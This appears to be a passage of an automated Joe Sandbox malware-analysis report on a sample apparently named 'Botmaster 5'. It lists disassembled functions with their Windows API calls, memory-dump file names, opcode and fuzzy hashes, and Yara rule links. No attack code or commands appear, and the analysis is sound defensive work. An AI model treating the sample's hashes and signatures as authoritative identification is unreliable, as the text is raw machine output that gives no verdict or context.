                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocBitsCompatibleCreateDeleteFreeObject
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3437057831-0
                                                                                                                                                                                                                  • Opcode ID: d8646412c1f6ce9f4794074eb2bc97fdc6a018329ea64bb06b30598035099619
                                                                                                                                                                                                                  • Instruction ID: 8465b202695c238b3ae0d4e9fe4b08a3bd3c6a242cfc37887a162a857859c989
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8646412c1f6ce9f4794074eb2bc97fdc6a018329ea64bb06b30598035099619
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4213C75A01128AFCF20CF95EC489AFBFB9FF48711B414026F805E6260D7B09E01CBA6
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040F37D Relevance: 9.1, APIs: 6, Instructions: 67threadCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • EnumWindows.USER32(0040F2F9,00000000), ref: 0040F391
                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040F3A3
                                                                                                                                                                                                                  • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,0040F148,00000001,?,004013FF,Error,Setup Error!), ref: 0040F3BE
                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040F3DC
                                                                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 0040F3F0
                                                                                                                                                                                                                  • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,0040F148,00000001,?,004013FF,Error), ref: 0040F406
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$CurrentThread$EnableEnumWindows
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2527101397-0
                                                                                                                                                                                                                  • Opcode ID: 65775b024da333776720b8b48b856232afa15cc38a0e9bb2702168fcd7b8023a
                                                                                                                                                                                                                  • Instruction ID: 8c226e51cc8635f6e62b2022f595b5ed9d312633e9181e8a8d49d8c44fb8f453
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65775b024da333776720b8b48b856232afa15cc38a0e9bb2702168fcd7b8023a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A11D372004345AFD7309F54EC84827BBAEFB00768724463EF96173EE0A7B56C888799
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004212B7 Relevance: 9.0, APIs: 6, Instructions: 50windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000BB,?,00000000), ref: 004212E1
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C1,00000000,00000000), ref: 004212EE
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000043F,00000001,00000000), ref: 004212FF
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,?), ref: 00421310
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0042131F
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000043F,00000000,00000000), ref: 00421328
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                  • Opcode ID: 02e987d53df3cbef245e8f409e3cae2aac303a95afa762e7120cb65c879fb7be
                                                                                                                                                                                                                  • Instruction ID: 0b9a16a522f7fd3f97a592088d891e01ba51c451cb40ad662e73ad4da742b64a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02e987d53df3cbef245e8f409e3cae2aac303a95afa762e7120cb65c879fb7be
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7012C35244308BFEA21AF52DC45F17BBADEFC5794F124829F380661A1C6B36C14DA65
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00428EB0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                  • String ID: %%.%df$+Infinity$-Infinity$NaN
                                                                                                                                                                                                                  • API String ID: 1279760036-1490034909
                                                                                                                                                                                                                  • Opcode ID: 4745b1e1ddac3ce79895f8bb59f00595ef45e88e5adb2dfbb69a1ee64ef27dae
                                                                                                                                                                                                                  • Instruction ID: 1a5ba899763f4ec21bd03d52b4e7b7ff6dc950c7895719f8ccd0bbe34ea85bc7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4745b1e1ddac3ce79895f8bb59f00595ef45e88e5adb2dfbb69a1ee64ef27dae
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C631E5717042209AD7106738AA5277F76A1DF90398F91891FFA82CA295FA3DCC15C39E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042F0D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: getenvmallocsscanf
                                                                                                                                                                                                                  • String ID: %ld%c$JPEGMEM$x
                                                                                                                                                                                                                  • API String ID: 677315340-3402169052
                                                                                                                                                                                                                  • Opcode ID: 72ca24a2383d1b441186ca72a89447233a3e1c1b8e86e819087623003865b1b8
                                                                                                                                                                                                                  • Instruction ID: ef7ec81a1092149a46b52017ee6d8a73ce70c151ef9556627c7d80d4e4dbee9b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72ca24a2383d1b441186ca72a89447233a3e1c1b8e86e819087623003865b1b8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C3137B06017118FD320CF1AE985517FBF4FF84744B90892FE18A8B650D3B8E9498B9A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0042709D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 004270A8
                                                                                                                                                                                                                  • memset.MSVCRT ref: 004270BB
                                                                                                                                                                                                                  • CreateDIBSection.GDI32(00000000,?,00000000,00000000,00000000,00000000), ref: 004270FA
                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00427103
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Create$CompatibleDeleteSectionmemset
                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                  • API String ID: 2003947935-3887548279
                                                                                                                                                                                                                  • Opcode ID: f3a830bbdf87e5507a96bc20fdbd5b4aebe8fba8e090bb32f1d16f3bc021be3e
                                                                                                                                                                                                                  • Instruction ID: c0bc99f6c5b4d1c4f7e5aef2da7679f6a3d8b8c3c20b2919d99ec40c3248418d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3a830bbdf87e5507a96bc20fdbd5b4aebe8fba8e090bb32f1d16f3bc021be3e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81012175901228ABDB10DFA9EC48DDEBBBCEF49754F00001AF905E7250DBB49914C7A9
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004250D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowLongW.USER32(00425167,000000F0), ref: 004250DA
                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004250F0
                                                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000), ref: 004250F9
                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?), ref: 00425118
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$LongMoveParentPoints
                                                                                                                                                                                                                  • String ID: UB
                                                                                                                                                                                                                  • API String ID: 473562985-2945346352
                                                                                                                                                                                                                  • Opcode ID: 59d12edffc04863f1f6f6e46025dceb43f29f0e0d44a51c4ffbcfe610a007019
                                                                                                                                                                                                                  • Instruction ID: c29f6b0cd4005ce8abfb4e5da2491cea8a54f1e29803db00971c40de37106f63
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59d12edffc04863f1f6f6e46025dceb43f29f0e0d44a51c4ffbcfe610a007019
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F0983114420ABFDF019F98EC49FAA3F6DFB04751F008120FA19991A0DBB1E960DB55
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041022D Relevance: 7.6, APIs: 5, Instructions: 87memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00000048,?,?,00410151,?), ref: 0041027E
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,?,?,?,00000048,?,?,00410151,?,?,?,00000048,0045DF26,004035F1,Title), ref: 0041028A
                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00000048,?,?,00410151,?), ref: 004102A9
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00000048,?,?,00410151,?,?,?,00000048,0045DF26,004035F1,Title), ref: 004102FD
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ByteCharHeapMultiWide$AllocFree
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3690260804-0
                                                                                                                                                                                                                  • Opcode ID: ca2acfdcf95123e963fbdc75f2fbf12453253f3edd71319481ecc9eb892350a0
                                                                                                                                                                                                                  • Instruction ID: 63ed29111a75999014ebc6f535024cbb55553f77f908cbd9dbe54acd3b20589d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca2acfdcf95123e963fbdc75f2fbf12453253f3edd71319481ecc9eb892350a0
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3216071509209AF9B109F94AC84C7B77ACE645358B10057FF551A2660E3B49CC0CB6A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00425ECC Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetObjectType.GDI32(?), ref: 00425EE6
                                                                                                                                                                                                                  • GetObjectW.GDI32(?,00000054,?), ref: 00425F02
                                                                                                                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00425F1C
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 00425F81
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 00425FA3
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Object$FreeHeap$Type
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1123114911-0
                                                                                                                                                                                                                  • Opcode ID: 726c54cd2032ba5590ec106494820243a0369350624da133bf641bb3173e40fd
                                                                                                                                                                                                                  • Instruction ID: 3bec5020e58add970d2afa92a22f0c35c2937a50f407d7160400b1797fa186a9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 726c54cd2032ba5590ec106494820243a0369350624da133bf641bb3173e40fd
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8621D671B00929AFDB219B54EE45BBF73B8EB40748F914036E501E6190E3B95C85CBAE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00426184 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Object$Select$CompatibleCreateDelete
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2280115113-0
                                                                                                                                                                                                                  • Opcode ID: a3adc51342128ecdd756b34d43cdfba3816c68b20ea79c0ed762e492af06f082
                                                                                                                                                                                                                  • Instruction ID: ba637104f0f3f080155fbaeccb1e01b9f3e729b59c26c13807343c33aedfe016
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3adc51342128ecdd756b34d43cdfba3816c68b20ea79c0ed762e492af06f082
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8921393260015AEFCF119F94EC848EF7FB9EF58301B45402AFA00A2221D7759D61DBA6
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00428437 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0046BD94,?,?,00001000,00000000,00427B38,?,00001000,?,?,?,0041C9FE,00401080,00000000,00001000,00000000), ref: 0042844E
                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0046BD94,?,?,00001000,00000000,00427B38,?,00001000,?,?,?,0041C9FE,00401080,00000000,00001000), ref: 004284A0
                                                                                                                                                                                                                    • Part of subcall function 00428437: HeapFree.KERNEL32(00000000,?,?,?,00001000,00000000,00427B38,?,00001000,?,?,?,0041C9FE,00401080,00000000,00001000), ref: 00428499
                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(00001020,00001000,?,00001000,00000000,00427B38,?,00001000,?,?,?,0041C9FE,00401080,00000000,00001000,00000000), ref: 004284B8
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00001000,00001000,?,00001000,00000000,00427B38,?,00001000,?,?,?,0041C9FE,00401080,00000000,00001000), ref: 004284C6
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3171405041-0
                                                                                                                                                                                                                  • Opcode ID: 2d2635e01a9d9fcb5ca5375e5f9a595cc3185a01d56246eb8547d64747e6cb8d
                                                                                                                                                                                                                  • Instruction ID: c7a530f51643d470d40bbf8b439c70b86bb2f1e766d886b1c84a311cc4824027
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d2635e01a9d9fcb5ca5375e5f9a595cc3185a01d56246eb8547d64747e6cb8d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C112E712026569F8710AF95EC84C5BB7F8FB44351384843EE55587621EBB4AC50CB5A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004205E5 Relevance: 7.6, APIs: 5, Instructions: 52windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000040C,00000000,?), ref: 00420615
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000150,?,00000000), ref: 00420631
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000144,?,00000000), ref: 00420640
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000014A,?,?), ref: 00420652
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000151,?,?), ref: 0042065F
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
